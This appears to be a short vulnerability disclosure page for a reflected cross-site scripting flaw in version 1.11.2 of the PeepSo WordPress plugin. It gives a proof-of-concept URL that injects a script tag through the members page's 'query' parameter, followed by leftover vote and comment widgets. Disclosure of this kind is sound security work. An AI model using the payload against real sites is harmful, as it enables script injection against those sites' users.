WordPress PeepSo 1.11.2 Cross Site Scripting

2018.11.12

Credit: Socket_0x03

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

===================================================================================
PeepSo v1.11.2 (WordPress Plugin) - Cross-Site Scripting Vulnerability in Members"
===================================================================================
____________________________________________________________________________________
# Exploit Title: PeepSo v1.11.2 (WordPress Plugin) - XSS Vulnerability in Members
# Date: [11-09-2018]
# Category: Webapps
____________________________________________________________________________________
# Author: Socket_0x03 (Alvaro J. Gene)
# Email: Socket_0x03 (at) teraexe (dot) com
# Website: www.teraexe.com
____________________________________________________________________________________
# Software Link: https://wordpress.org/plugins/peepso-core/
# Plugin: PeepSo
# Version: 1.11.2
# File: Members
# Parameter: query
# Language: This application is available in English language.
# Plugin Description: PeepSo is a social network plugin for WordPress with different
kinds of features, such as user profiles, user registration, and other features.
____________________________________________________________________________________
# Cross-Site Scripting Vulnerability:
http://www.website.com/wordpress/index.php/members/?blocked/&query="><script>alert(23)</script>

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

WordPress PeepSo 1.11.2 Cross Site Scripting

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.